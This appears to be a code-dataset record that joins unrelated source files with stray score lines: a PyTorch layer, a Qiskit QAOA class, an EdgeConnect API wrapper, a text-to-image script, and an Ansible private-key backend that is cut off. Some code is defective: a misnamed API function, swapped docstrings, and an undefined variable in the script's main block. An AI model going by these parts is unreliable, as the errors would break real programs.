<filename>lib/modeling/contrasted_context_net.py # Author zhangshu import torch import torch.nn as nn import torch.nn.functional as F from torch.autograd import Variable from core.config import cfg import nn as mynn import utils.net as net_utils def get_cc_net(input_channels, output_channels): """ Get an intance of the contrasted_context_net """ return CCNet(input_channels, output_channels) class _CCBaseNet(nn.Module): def __init__(self): super(_CCBaseNet, self).__init__() def detectron_weight_mapping(self): return {}, [] class CCNet(_CCBaseNet): """An implementation of the Contrasted Contest layer from CVPR2018 paper. Introduced in << Context contrasted feature and gated multi-scale aggregation ...>> Params: input_channels, output_channels """ def __init__(self, input_channels, output_channels): super(CCNet, self).__init__() self.conv_local = nn.Conv2d(input_channels, output_channels, kernel_size=(3,3), stride=1, padding=1, bias=False) self.conv_context = nn.Conv2d(input_channels, output_channels, kernel_size=(3,3), stride=1, padding=cfg.CONTRASTED_CONTEXT.DILATION_SIZE, dilation=cfg.CONTRASTED_CONTEXT.DILATION_SIZE, bias=False) self.relu = nn.ReLU(inplace=True) def forward(self, x): local_info = self.conv_local(x) context_info = self.conv_context(x) return self.relu(local_info - context_info)
1.929688
2
qiskit_optimization/runtime/qaoa_program.py
X-Libor/qiskit-optimization
0
12760875
<gh_stars>0 # This code is part of Qiskit. # # (C) Copyright IBM 2021. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """The Qiskit Optimization QAOA Quantum Program.""" from typing import List, Callable, Optional, Any, Dict, Union import numpy as np from qiskit import QuantumCircuit from qiskit.algorithms import MinimumEigensolverResult from qiskit.circuit.library import QAOAAnsatz from qiskit.opflow import OperatorBase from qiskit.providers import Provider from qiskit.providers.backend import Backend from qiskit_optimization.exceptions import QiskitOptimizationError from .vqe_program import VQEProgram class QAOAProgram(VQEProgram): """The Qiskit Optimization QAOA Quantum Program.""" def __init__( self, optimizer: Optional[Dict[str, Any]] = None, reps: int = 1, initial_state: Optional[QuantumCircuit] = None, mixer: Union[QuantumCircuit, OperatorBase] = None, initial_point: Optional[np.ndarray] = None, provider: Optional[Provider] = None, backend: Optional[Backend] = None, shots: int = 1024, measurement_error_mitigation: bool = False, callback: Optional[Callable[[int, np.ndarray, float, float], None]] = None, store_intermediate: bool = False, ) -> None: """ Args: optimizer: A dictionary specifying a classical optimizer. Currently only SPSA and QN-SPSA are supported. Per default, SPSA is used. The dictionary must contain a key ``name`` for the name of the optimizer and may contain additional keys for the settings. E.g. ``{'name': 'SPSA', 'maxiter': 100}``. reps: the integer parameter :math:`p` as specified in https://arxiv.org/abs/1411.4028, Has a minimum valid value of 1. initial_state: An optional initial state to prepend the QAOA circuit with mixer: the mixer Hamiltonian to evolve with or a custom quantum circuit. Allows support of optimizations in constrained subspaces as per https://arxiv.org/abs/1709.03489 as well as warm-starting the optimization as introduced in http://arxiv.org/abs/2009.10095. initial_point: An optional initial point (i.e. initial parameter values) for the optimizer. If ``None`` a random vector is used. provider: The provider. backend: The backend to run the circuits on. shots: The number of shots to be used measurement_error_mitigation: Whether or not to use measurement error mitigation. callback: a callback that can access the intermediate data during the optimization. Four parameter values are passed to the callback as follows during each evaluation by the optimizer for its current set of parameters as it works towards the minimum. These are: the evaluation count, the optimizer parameters for the ansatz, the evaluated mean and the evaluated standard deviation. store_intermediate: Whether or not to store intermediate values of the optimization steps. Per default False. """ super().__init__( ansatz=None, optimizer=optimizer, initial_point=initial_point, provider=provider, backend=backend, shots=shots, measurement_error_mitigation=measurement_error_mitigation, callback=callback, store_intermediate=store_intermediate, ) self._initial_state = initial_state self._mixer = mixer self._reps = reps @property def ansatz(self) -> Optional[QuantumCircuit]: return self._ansatz @ansatz.setter def ansatz(self, ansatz: QuantumCircuit) -> None: raise QiskitOptimizationError( "Cannot set the ansatz for QAOA, it is directly inferred from " "the problem Hamiltonian." ) @property def initial_state(self) -> Optional[QuantumCircuit]: """ Returns: Returns the initial state. """ return self._initial_state @initial_state.setter def initial_state(self, initial_state: Optional[QuantumCircuit]) -> None: """ Args: initial_state: Initial state to set. """ self._initial_state = initial_state @property def mixer(self) -> Union[QuantumCircuit, OperatorBase]: """ Returns: Returns the mixer. """ return self._mixer @mixer.setter def mixer(self, mixer: Union[QuantumCircuit, OperatorBase]) -> None: """ Args: mixer: Mixer to set. """ self._mixer = mixer @property def reps(self) -> int: """ Returns: Returns the reps. """ return self._reps @reps.setter def reps(self, reps: int) -> None: """ Args: reps: The new number of reps. """ self._reps = reps def compute_minimum_eigenvalue( self, operator: OperatorBase, aux_operators: Optional[List[Optional[OperatorBase]]] = None, ) -> MinimumEigensolverResult: self._ansatz = QAOAAnsatz( operator, reps=self.reps, initial_state=self.initial_state, mixer_operator=self.mixer, ) return super().compute_minimum_eigenvalue(operator, aux_operators)
1.554688
2
pyedgeconnect/orch/_link_integrity.py
SPOpenSource/edgeconnect-python
15
12761003
<reponame>SPOpenSource/edgeconnect-python # MIT License # (C) Copyright 2021 Hewlett Packard Enterprise Development LP. # # linkIntegrity : Link integrity and bandwidth test def get_link_integrity_test_result( self, ne_id: str, ) -> dict: """Retrieve current link integrity test status/results from appliance .. list-table:: :header-rows: 1 * - Swagger Section - Method - Endpoint * - linkIntegrity - GET - /linkIntegrityTest/status/{neId} :param ne_id: Appliance id in the format of integer.NE e.g. ``3.NE`` :type ne_id: str :return: Returns dictionary of test status and related results :rtype: dict """ return self._get("/linkIntegrityTest/status/{}".format(ne_id)) def update_user_defined_app_port_protocol( self, ne_pk_1: str, bandwidth_1: str, path_1: str, ne_pk_2: str, bandwidth_2: str, path_2: str, duration: int, test_program: str, dscp: str = "any", ) -> bool: """Start a link integrity test between two appliances using specified parameters .. list-table:: :header-rows: 1 * - Swagger Section - Method - Endpoint * - linkIntegrity - POST - /linkIntegrityTest/run :param ne_pk_1: Network Primary Key (nePk) of first appliance :type ne_pk_1: str :param bandwidth_1: Data transfer rate to use from first appliance :type bandwidth_1: str :param path_1: Traffic path for first appliance. Can have values of "pass-through", "pass-through-unshaped" or "{tunnelID}" e.g. "tunnel_1". :type path_1: str :param ne_pk_2: Network Primary Key (nePk) of second appliance :type ne_pk_2: str :param bandwidth_2: Data transfer rate to use from second appliance :type bandwidth_2: str :param path_2: Traffic path for first appliance. Can have values of "pass-through", "pass-through-unshaped" or "{tunnelID}" e.g. "tunnel_1". :type path_2: str :param duration: Duration of test in seconds :type duration: int :param test_program: Test program to be used for this test. Can have values of "iperf" or "tcpperf" :type test_program: str :param dscp: DSCP value for test traffic, defaults to "any" :type dscp: str, optional :return: Returns True/False based on successful call :rtype: bool """ data = { "appA": {"nePk": ne_pk_1, "bandwidth": bandwidth_1, "path": path_1}, "appB": {"nePk": ne_pk_2, "bandwidth": bandwidth_2, "path": path_2}, "duration": duration, "testProgram": test_program, "DSCP": dscp, } return self._post("/linkIntegrityTest/run", data=data, return_type="bool")
1.546875
2
bpcs/text_to_image.py
BburnN123/bpcs
20
12761131
import re import string from math import sqrt import numpy as np from PIL import Image from .test_utils import show_html_diff def digits_in_base_as_tuple(x, base): """ x is int base is int gets the digits of x in the new base e.g. digits_in_base_as_tuple(20, 2) == (1,0,1,0,0) """ cur = x digs = [] while cur: digs.append(cur % base) cur /= base return tuple(reversed(digs)) def get_word_color_map_fcn(all_words): """ given a set of words, returns a fcn returning an RGB color where each word is maximally spaced out from other word colors """ words = set(all_words) words.add(' ') # add space for padding ncolors = 256**3 ncolors_per_word = ncolors/len(words) word_order = sorted(words) def get_word_color(word): ind = word_order.index(word) assert ind >= 0 colors = digits_in_base_as_tuple(ind*ncolors_per_word, 256) while len(colors) < 3: colors = (0,) + colors assert len(colors) == 3 return colors return get_word_color def list_to_uint8_array(colors, dims): arr = np.array(colors) arr_shaped = np.resize(arr, dims) if arr.size != arr_shaped.size: diff = arr_shaped.size - arr.size print "WARNING: txt will be replicated by {0} chars when printed to image".format(diff) arr_shaped = np.uint8(arr_shaped) return arr_shaped def adjust_words_and_get_dims(words, verbose=False): area = len(words) one_side = sqrt(area) desired_side = (int(one_side)+1) if one_side > int(one_side) else int(one_side) diff = desired_side**2 - area words += [' ']*diff assert len(words) == desired_side**2, desired_side**2 - len(words) if verbose: print 'Adding %s words to end of txt' % (diff,) return words, [desired_side, desired_side, 3] def str_to_words(txt, keep_spaces=False): # if keep_spaces: # # want each space to be its own word # space_first = txt[0] == ' ' # words = str_to_words(txt) # space_chunks = [x for x in re.split('[^ ]', txt) if x] + [' '] # final = [] # for word, space in zip(words, space_chunks): # if space_first: # for i in range(len(space)): # final.append(' ') # final.append(word) # else: # final.append(word) # for i in range(len(space)): # final.append(' ') # return final if keep_spaces: words = str_to_words(txt) spaces = [x for x in re.split('[^ ]', txt) if x] + [' '] return [x for pair in zip(words, spaces) for x in pair] else: return txt.split() # return re.sub('['+string.punctuation+']', '', txt).split() def txt_to_uint8_array_by_word(txt): words = str_to_words(txt, True) words, dims = adjust_words_and_get_dims(words) get_color = get_word_color_map_fcn(words) colors = [get_color(word) for word in words] return list_to_uint8_array(colors, dims) def adjust_txt_and_get_dims(txt, verbose=False): added = 0 # pad with 0s to make divisible by 3 rem = len(txt) % 3 add = 3-rem if rem else 0 txt += ' '*add added += add # pad with 0s to make square area = len(txt)/3 one_side = sqrt(area) desired_side = (int(one_side)+1) if one_side > int(one_side) else int(one_side) diff = 3*(desired_side**2 - area) txt += ' '*diff added += diff assert len(txt) == 3*(desired_side**2), 3*(desired_side**2) - len(txt) if verbose: print 'Adding %s spaces to end of txt' % (added,) return txt, [desired_side, desired_side, 3] def txt_to_uint8_array_by_char(txt): txt, dims = adjust_txt_and_get_dims(txt, True) colors = [ord(x) for x in txt] return list_to_uint8_array(colors, dims) def image_to_txt(imfile, txtfile): """ converts each character to a number assuming the character is ascii and arranges all resulting colors into an array => image note: colors are inserted depth first, meaning e.g. if the first word is 'the' then the first pixel will be (ord('t'), ord('h'), ord('e')) 'the' => (116, 104, 101) == #6A6865 """ png = Image.open(imfile).convert('RGB') arr = np.array(png) dims = arr.size arr_flat = np.resize(arr, dims) chars = [chr(x) for x in arr_flat] with open(txtfile, 'w') as f: f.write(''.join(chars)) def txt_to_image(txtfile, imfile, by_char=True): txt = open(txtfile).read() if by_char: arr = txt_to_uint8_array_by_char(txt) else: arr = txt_to_uint8_array_by_word(txt) im = Image.fromarray(arr) im.save(imfile) def test_adjust_txt_and_get_dims(): vals = [5, 10, 11, 19, 24, 25, 31, 32, 269393] sides = [2, 2, 2, 3, 3, 3, 4, 4, 300] for val, side in zip(vals, sides): assert adjust_txt_and_get_dims(' '*val)[1] == [side, side, 3], val def test_invertibility(txtfile): """ roughly, assert txtfile == image_to_txt(txt_to_image(txtfile)) ignoring whitespace before and after txt """ pngfile = txtfile.replace('.txt', '.png') txt_to_image(txtfile, pngfile) new_txtfile = txtfile.replace('.', '_new.') image_to_txt(pngfile, new_txtfile) txt1 = open(txtfile).read().strip() txt2 = open(new_txtfile).read().strip() assert txt1 == txt2, show_html_diff((txt1, 'OG'), (txt2, 'NEW')) def test_all(): txtfile = 'docs/tmp.txt' test_adjust_txt_and_get_dims() test_invertibility(txtfile) if __name__ == '__main__': test_all() by_char = False base_dir = '/Users/mobeets/bpcs-steg/docs/' infiles = ['karenina', 'warandpeace'] infiles = ['tmp', 'tmp1', 'tmp2'] infiles = [base_dir + infile + '.txt' for infile in infiles] outfiles = [base_dir + outfile + '.txt' for outfile in outfiles] for infile,outfile in zip(infiles, outfiles): txt_to_image(infile, outfile, by_char) # infile = '/Users/mobeets/Desktop/tmp2.png' # outfile = '/Users/mobeets/Desktop/tmp2.txt' # image_to_txt(infile, outfile, by_char)
2.84375
3
intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/community/crypto/plugins/module_utils/crypto/module_backends/privatekey.py
Stienvdh/statrick
0
12761259
<filename>intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/community/crypto/plugins/module_utils/crypto/module_backends/privatekey.py # -*- coding: utf-8 -*- # # Copyright: (c) 2016, <NAME> <<EMAIL>> # Copyright: (c) 2020, <NAME> <<EMAIL>> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type import abc import base64 import traceback from distutils.version import LooseVersion from ansible.module_utils import six from ansible.module_utils.basic import missing_required_lib from ansible.module_utils._text import to_bytes from ansible_collections.community.crypto.plugins.module_utils.crypto.basic import ( CRYPTOGRAPHY_HAS_X25519, CRYPTOGRAPHY_HAS_X25519_FULL, CRYPTOGRAPHY_HAS_X448, CRYPTOGRAPHY_HAS_ED25519, CRYPTOGRAPHY_HAS_ED448, OpenSSLObjectError, OpenSSLBadPassphraseError, ) from ansible_collections.community.crypto.plugins.module_utils.crypto.support import ( load_privatekey, get_fingerprint_of_privatekey, ) from ansible_collections.community.crypto.plugins.module_utils.crypto.pem import ( identify_private_key_format, ) from ansible_collections.community.crypto.plugins.module_utils.crypto.module_backends.common import ArgumentSpec MINIMAL_PYOPENSSL_VERSION = '0.6' MINIMAL_CRYPTOGRAPHY_VERSION = '1.2.3' PYOPENSSL_IMP_ERR = None try: import OpenSSL from OpenSSL import crypto PYOPENSSL_VERSION = LooseVersion(OpenSSL.__version__) except ImportError: PYOPENSSL_IMP_ERR = traceback.format_exc() PYOPENSSL_FOUND = False else: PYOPENSSL_FOUND = True CRYPTOGRAPHY_IMP_ERR = None try: import cryptography import cryptography.exceptions import cryptography.hazmat.backends import cryptography.hazmat.primitives.serialization import cryptography.hazmat.primitives.asymmetric.rsa import cryptography.hazmat.primitives.asymmetric.dsa import cryptography.hazmat.primitives.asymmetric.ec import cryptography.hazmat.primitives.asymmetric.utils CRYPTOGRAPHY_VERSION = LooseVersion(cryptography.__version__) except ImportError: CRYPTOGRAPHY_IMP_ERR = traceback.format_exc() CRYPTOGRAPHY_FOUND = False else: CRYPTOGRAPHY_FOUND = True class PrivateKeyError(OpenSSLObjectError): pass # From the object called `module`, only the following properties are used: # # - module.params[] # - module.warn(msg: str) # - module.fail_json(msg: str, **kwargs) @six.add_metaclass(abc.ABCMeta) class PrivateKeyBackend: def __init__(self, module, backend): self.module = module self.type = module.params['type'] self.size = module.params['size'] self.curve = module.params['curve'] self.passphrase = module.params['passphrase'] self.cipher = module.params['cipher'] self.format = module.params['format'] self.format_mismatch = module.params.get('format_mismatch', 'regenerate') self.regenerate = module.params.get('regenerate', 'full_idempotence') self.backend = backend self.private_key = None self.existing_private_key = None self.existing_private_key_bytes = None @abc.abstractmethod def generate_private_key(self): """(Re-)Generate private key.""" pass def convert_private_key(self): """Convert existing private key (self.existing_private_key) to new private key (self.private_key). This is effectively a copy without active conversion. The conversion is done during load and store; get_private_key_data() uses the destination format to serialize the key. """ self._ensure_existing_private_key_loaded() self.private_key = self.existing_private_key @abc.abstractmethod def get_private_key_data(self): """Return bytes for self.private_key.""" pass def set_existing(self, privatekey_bytes): """Set existing private key bytes. None indicates that the key does not exist.""" self.existing_private_key_bytes = privatekey_bytes def has_existing(self): """Query whether an existing private key is/has been there.""" return self.existing_private_key_bytes is not None @abc.abstractmethod def _check_passphrase(self): """Check whether provided passphrase matches, assuming self.existing_private_key_bytes has been populated.""" pass @abc.abstractmethod def _ensure_existing_private_key_loaded(self): """Make sure that self.existing_private_key is populated from self.existing_private_key_bytes.""" pass @abc.abstractmethod def _check_size_and_type(self): """Check whether provided size and type matches, assuming self.existing_private_key has been populated.""" pass @abc.abstractmethod def _check_format(self): """Check whether the key file format, assuming self.existing_private_key and self.existing_private_key_bytes has been populated.""" pass def needs_regeneration(self): """Check whether a regeneration is necessary.""" if self.regenerate == 'always': return True if not self.has_existing(): # key does not exist return True if not self._check_passphrase(): if self.regenerate == 'full_idempotence': return True self.module.fail_json(msg='Unable to read the key. The key is protected with a another passphrase / no passphrase or broken.' ' Will not proceed. To force regeneration, call the module with `generate`' ' set to `full_idempotence` or `always`, or with `force=yes`.') self._ensure_existing_private_key_loaded() if self.regenerate != 'never': if not self._check_size_and_type(): if self.regenerate in ('partial_idempotence', 'full_idempotence'): return True self.module.fail_json(msg='Key has wrong type and/or size.' ' Will not proceed. To force regeneration, call the module with `generate`' ' set to `partial_idempotence`, `full_idempotence` or `always`, or with `force=yes`.') # During generation step, regenerate if format does not match and format_mismatch == 'regenerate' if self.format_mismatch == 'regenerate' and self.regenerate != 'never': if not self._check_format(): if self.regenerate in ('partial_idempotence', 'full_idempotence'): return True self.module.fail_json(msg='Key has wrong format.' ' Will not proceed. To force regeneration, call the module with `generate`' ' set to `partial_idempotence`, `full_idempotence` or `always`, or with `force=yes`.' ' To convert the key, set `format_mismatch` to `convert`.') return False def needs_conversion(self): """Check whether a conversion is necessary. Must only be called if needs_regeneration() returned False.""" # During conversion step, convert if format does not match and format_mismatch == 'convert' self._ensure_existing_private_key_loaded() return self.has_existing() and self.format_mismatch == 'convert' and not self._check_format() def _get_fingerprint(self): if self.private_key: return get_fingerprint_of_privatekey(self.private_key, backend=self.backend) try: self._ensure_existing_private_key_loaded() except Exception as dummy: # Ignore errors pass if self.existing_private_key: return get_fingerprint_of_privatekey(self.existing_private_key, backend=self.backend) def dump(self, include_key): """Serialize the object into a dictionary.""" if not self.private_key: try: self._ensure_existing_private_key_loaded() except Exception as dummy: # Ignore errors pass result = { 'type': self.type, 'size': self.size, 'fingerprint': self._get_fingerprint(), } if self.type == 'ECC': result['curve'] = self.curve if include_key: # Get hold of private key bytes pk_bytes = self.existing_private_key_bytes if self.private_key is not None: pk_bytes = self.get_private_key_data() # Store result if pk_bytes: if identify_private_key_format(pk_bytes) == 'raw': result['privatekey'] = base64.b64encode(pk_bytes) else: result['privatekey'] = pk_bytes.decode('utf-8') else: result['privatekey'] = None return result # Implementation with using pyOpenSSL class PrivateKeyPyOpenSSLBackend(PrivateKeyBackend): def __init__(self, module): super(PrivateKeyPyOpenSSLBackend, self).__init__(module=module, backend='pyopenssl') if self.type == 'RSA': self.openssl_type = crypto.TYPE_RSA elif self.type == 'DSA': self.openssl_type = crypto.TYPE_DSA else: self.module.fail_json(msg="PyOpenSSL backend only supports RSA and DSA keys.") if self.format != 'auto_ignore': self.module.fail_json(msg="PyOpenSSL backend only supports auto_ignore format.") def generate_private_key(self): """(Re-)Generate private key.""" self.private_key = crypto.PKey() try: self.private_key.generate_key(self.openssl_type, self.size) except (TypeError, ValueError) as exc: raise PrivateKeyError(exc) def _ensure_existing_private_key_loaded(self): if self.existing_private_key is None and self.has_existing(): try: self.existing_private_key = load_privatekey( None, self.passphrase, content=self.existing_private_key_bytes, backend=self.backend) except OpenSSLBadPassphraseError as exc: raise PrivateKeyError(exc) def get_private_key_data(self): """Return bytes for self.private_key""" if self.cipher and self.passphrase: return crypto.dump_privatekey(crypto.FILETYPE_PEM, self.private_key, self.cipher, to_bytes(self.passphrase)) else: return crypto.dump_privatekey(crypto.FILETYPE_PEM, self.private_key) def _check_passphrase(self): try: load_privatekey(None, self.passphrase, content=self.existing_private_key_bytes, backend=self.backend) return True except Exception as dummy: return False def _check_size_and_type(self): return self.size == self.existing_private_key.bits() and self.openssl_type == self.existing_private_key.type() def _check_format(self): # Not supported by this backend return True # Implementation with using cryptography class PrivateKeyCryptographyBackend(PrivateKeyBackend): def _get_ec_class(self, ectype): ecclass = cryptography.hazmat.primitives.asymmetric.ec.__dict__.get(ectype) if ecclass is None: self.module.fail_json(msg='Your cryptography version does not support {0}'.format(ectype)) return ecclass def _add_curve(self, name, ectype, deprecated=False): def create(size): ecclass = self._get_ec_class(ectype) return ecclass() def verify(privatekey): ecclass = self._get_ec_class(ectype) return isinstance(privatekey.private_numbers().public_numbers.curve, ecclass) self.curves[name] = { 'create': create, 'verify': verify, 'deprecated': deprecated, } def __init__(self, module): super(PrivateKeyCryptographyBackend, self).__init__(module=module, backend='cryptography') self.curves = dict() self._add_curve('secp224r1', 'SECP224R1') self._add_curve('secp256k1', 'SECP256K1') self._add_curve('secp256r1', 'SECP256R1') self._add_curve('secp384r1', 'SECP384R1') self._add_curve('secp521r1', 'SECP521R1') self._add_curve('secp192r1', 'SECP192R1', deprecated=True) self._add_curve('sect163k1', 'SECT163K1', deprecated=True) self._add_curve('sect163r2', 'SECT163R2', deprecated=True) self._add_curve('sect233k1', 'SECT233K1', deprecated=True) self._add_curve('sect233r1', 'SECT233R1', deprecated=True) self._add_curve('sect283k1', 'SECT283K1', deprecated=True) self._add_curve('sect283r1', 'SECT283R1', deprecated=True) self._add_curve('sect409k1', 'SECT409K1', deprecated=True) self._add_curve('sect409r1', 'SECT409R1', deprecated=True) self._add_curve('sect571k1', 'SECT571K1', deprecated=True) self._add_curve('sect571r1', 'SECT571R1', deprecated=True) self._add_curve('brainpoolP256r1', 'BrainpoolP256R1', deprecated=True) self._add_curve('brainpoolP384r1', 'BrainpoolP384R1', deprecated=True) self._add_curve('brainpoolP512r1', 'BrainpoolP512R1', deprecated=True) self.cryptography_backend = cryptography.hazmat.backends.default_backend() if not CRYPTOGRAPHY_HAS_X25519 and self.type == 'X25519': self.module.fail_json(msg='Your cryptography version does not support X25519') if not CRYPTOGRAPHY_HAS_X25519_FULL and self.type == 'X25519': self.module.fail_json(msg='Your cryptography version does not support X25519 serialization') if not CRYPTOGRAPHY_HAS_X448 and self.type == 'X448': self.module.fail_json(msg='Your cryptography version does not support X448') if not CRYPTOGRAPHY_HAS_ED25519 and self.type == 'Ed25519': self.module.fail_json(msg='Your cryptography version does not support Ed25519') if not CRYPTOGRAPHY_HAS_ED448 and self.type == 'Ed448': self.module.fail_json(msg='Your cryptography version does not support Ed448') def _get_wanted_format(self): if self.format not in ('auto', 'auto_ignore'): return self.format if self.type in ('X25519', 'X448', 'Ed25519', 'Ed448'): return 'pkcs8' else: return 'pkcs1' def generate_private_key(self): """(Re-)Generate private key.""" try: if self.type == 'RSA': self.private_key = cryptography.hazmat.primitives.asymmetric.rsa.generate_private_key( public_exponent=65537, # OpenSSL always uses this key_size=self.size, backend=self.cryptography_backend ) if self.type == 'DSA': self.private_key = cryptography.hazmat.primitives.asymmetric.dsa.generate_private_key( key_size=self.size, backend=self.cryptography_backend ) if CRYPTOGRAPHY_HAS_X25519_FULL and self.type == 'X25519': self.private_key = cryptography.hazmat.primitives.asymmetric.x25519.X25519PrivateKey.generate() if CRYPTOGRAPHY_HAS_X448 and self.type == 'X448': self.private_key = cryptography.hazmat.primitives.asymmetric.x448.X448PrivateKey.generate() if CRYPTOGRAPHY_HAS_ED25519 and self.type == 'Ed25519': self.private_key = cryptography.hazmat.primitives.asymmetric.ed25519.Ed25519PrivateKey.generate() if CRYPTOGRAPHY_HAS_ED448 and self.type == 'Ed448': self.private_key = cryptography.hazmat.primitives.asymmetric.ed448.Ed448PrivateKey.generate() if self.type == 'ECC' and self.curve in self.curves: if self.curves[self.curve]['deprecated']: self.module.warn('Elliptic curves of type {0} should not be used for new keys!'.format(self.curve)) self.private_key = cryptography.hazmat.primitives.asymmetric.ec.generate_private_key( curve=self.curves[self.curve]['create'](self.size), backend=self.cryptography_backend ) except cryptography.exceptions.UnsupportedAlgorithm as dummy: self.module.fail_json(msg='Cryptography backend does not support the algorithm required for {0}'.format(self.type)) def get_private_key_data(self): """Return bytes for self.private_key""" # Select export format and encoding try: export_format = self._get_wanted_format() export_encoding = cryptography.hazmat.primitives.serialization.Encoding.PEM if export_format == 'pkcs1': # "TraditionalOpenSSL" format is PKCS1 export_format = cryptography.hazmat.primitives.serialization.PrivateFormat.TraditionalOpenSSL elif export_format == 'pkcs8': export_format = cryptography.hazmat.primitives.serialization.PrivateFormat.PKCS8 elif export_format == 'raw': export_format = cryptography.hazmat.primitives.serialization.PrivateFormat.Raw export_encoding = cryptography.hazmat.primitives.serialization.Encoding.Raw except AttributeError: self.module.fail_json(msg='Cryptography backend does not support the selected output format "{0}"'.format(self.format)) # Select key encryption encryption_algorithm = cryptography.hazmat.primitives.serialization.NoEncryption() if self.cipher and self.passphrase: if self.cipher == 'auto': encryption_algorithm = cryptography.hazmat.primitives.serialization.BestAvailableEncryption(to_bytes(self.passphrase)) else: self.module.fail_json(msg='Cryptography backend can only use "auto" for cipher option.') # Serialize key try: return self.private_key.private_bytes( encoding=export_encoding, format=export_format, encryption_algorithm=encryption_algorithm ) except ValueError as dummy: self.module.fail_json( msg='Cryptography backend cannot serialize the private key in the required format "{0}"'.format(self.format) ) except Exception as dummy: self.module.fail_json( msg='Error while serializing the private key in the required format "{0}"'.format(self.format), exception=traceback.format_exc() ) def _load_privatekey(self): data = self.existing_private_key_bytes try: # Interpret bytes depending on format. format = identify_private_key_format(data) if format == 'raw': if len(data) == 56 and CRYPTOGRAPHY_HAS_X448: return cryptography.hazmat.primitives.asymmetric.x448.X448PrivateKey.from_private_bytes(data) if len(data) == 57 and CRYPTOGRAPHY_HAS_ED448: return cryptography.hazmat.primitives.asymmetric.ed448.Ed448PrivateKey.from_private_bytes(data) if len(data) == 32: if CRYPTOGRAPHY_HAS_X25519 and (self.type == 'X25519' or not CRYPTOGRAPHY_HAS_ED25519): return cryptography.hazmat.primitives.asymmetric.x25519.X25519PrivateKey.from_private_bytes(data) if CRYPTOGRAPHY_HAS_ED25519 and (self.type == 'Ed25519' or not CRYPTOGRAPHY_HAS_X25519): return cryptography.hazmat.primitives.asymmetric.ed25519.Ed25519PrivateKey.from_private_bytes(data) if CRYPTOGRAPHY_HAS_X25519 and CRYPTOGRAPHY_HAS_ED25519: try: return cryptography.hazmat.primitives.asymmetric.x25519.X25519PrivateKey.from_private_bytes(data) except Exception: return cryptography.hazmat.primitives.asymmetric.ed25519.Ed25519PrivateKey.from_private_bytes(data) raise PrivateKeyError('Cannot load raw key') else: return cryptography.hazmat.primitives.serialization.load_pem_private_key( data, None if self.passphrase is None else to_bytes(self.passphrase), backend=self.cryptography_backend ) except Exception as e: raise PrivateKeyError(e) def _ensure_existing_private_key_loaded(self): if self.existing_private_key is None and self.has_existing(): self.existing_private_key = self._load_privatekey() def _check_passphrase(self): try: format = identify_private_key_format(self.existing_private_key_bytes) if format == 'raw': # Raw keys cannot be encrypted. To avoid incompatibilities, we try to # actually load the key (and return False when this fails). self._load_privatekey() # Loading the key succeeded. Only return True when no passphrase was # provided. return self.passphrase is None else: return cryptography.hazmat.primitives.serialization.load_pem_private_key( self.existing_private_key_bytes, None if self.passphrase is None else to_bytes(self.passphrase), backend=self.cryptography_backend ) except Exception as dummy: return False def _check_size_and_type(self): if isinstance(self.existing_private_key, cryptography.hazmat.primitives.asymmetric.rsa.RSAPrivateKey): return self.type == 'RSA' and self.size == self.existing_private_key.key_size if isinstance(self.existing_private_key, cryptography.hazmat.primitives.asymmetric.dsa.DSAPrivateKey): return self.type == 'DSA' and self.size == self.existing_private_key.key_size if CRYPTOGRAPHY_HAS_X25519 and isinstance(self.existing_private_key, cryptography.hazmat.primitives.asymmetric.x25519.X25519PrivateKey): return self.type == 'X25519' if CRYPTOGRAPHY_HAS_X448 and isinstance(self.existing_private_key, cryptography.hazmat.primitives.asymmetric.x448.X448PrivateKey): return self.type == 'X448' if CRYPTOGRAPHY_HAS_ED25519 and isinstance(self.existing_private_key, cryptography.hazmat.primitives.asymmetric.ed25519.Ed25519PrivateKey): return self.type == 'Ed25519' if CRYPTOGRAPHY_HAS_ED448 and isinstance(self.existing_private_key, cryptography.hazmat.primitives.asymmetric.ed448.Ed448PrivateKey): return self.type == 'Ed448' if isinstance(self.existing_private_key, cryptography.hazmat.primitives.asymmetric.ec.EllipticCurvePrivateKey): if self.type != 'ECC': return False if self.curve not in self.curves: return False return self.curves[self.curve]['verify'](self.existing_private_key) return False def _check_format(self): if self.format == 'auto_ignore': return True try: format = identify_private_key_format(self.existing_private_key_bytes) return format == self._get_wanted_format() except Exception as dummy: return False def select_backend(module, backend): if backend == 'auto': # Detection what is possible can_use_cryptography = CRYPTOGRAPHY_FOUND and CRYPTOGRAPHY_VERSION >= LooseVersion(MINIMAL_CRYPTOGRAPHY_VERSION) can_use_pyopenssl = PYOPENSSL_FOUND and PYOPENSSL_VERSION >= LooseVersion(MINIMAL_PYOPENSSL_VERSION) # Decision if module.params['cipher'] and module.params['passphrase'] and module.params['cipher'] != 'auto': # First try pyOpenSSL, then cryptography if can_use_pyopenssl: backend = 'pyopenssl' elif can_use_cryptography: backend = 'cryptography' else: # First try cryptography, then pyOpenSSL if can_use_cryptography: backend = 'cryptography' elif can_use_pyopenssl: backend = 'pyopenssl' # Success? if backend == 'auto': module.fail_json(msg=("Can't detect any of the required Python libraries " "cryptography (>= {0}) or PyOpenSSL (>= {1})").format( MINIMAL_CRYPTOGRAPHY_VERSION, MINIMAL_PYOPENSSL_VERSION)) if backend == 'pyopenssl': if not PYOPENSSL_FOUND: module.fail_json(msg=missing_required_lib('pyOpenSSL >= {0}'.format(MINIMAL_PYOPENSSL_VERSION)), exception=PYOPENSSL_IMP_ERR) module.deprecate('The module is using the PyOpenSSL backend. This backend has been deprecated', version='2.0.0', collection_name='community.crypto') return backend, PrivateKeyPyOpenSSLBackend(module) elif backend == 'cryptography': if not CRYPTOGRAPHY_FOUND: module.fail_json(msg=missing_required_lib('cryptography >= {0}'.format(MINIMAL_CRYPTOGRAPHY_VERSION)), exception=CRYPTOGRAPHY_IMP_ERR) return backend, PrivateKeyCryptographyBackend(module) else: raise Exception('Unsupported value for backend: {0}'.format(backend)) def get_privatekey_argument_spec(): return ArgumentSpec( argument_spec=dict( size=dict(type='int', default=4096), type=dict(type='str', default='RSA', choices=[ 'DSA', 'ECC', 'Ed25519', 'Ed448', 'RSA', 'X25519', 'X448' ]), curve=dict(type='str', choices=[ 'secp224r1', 'secp256k1', 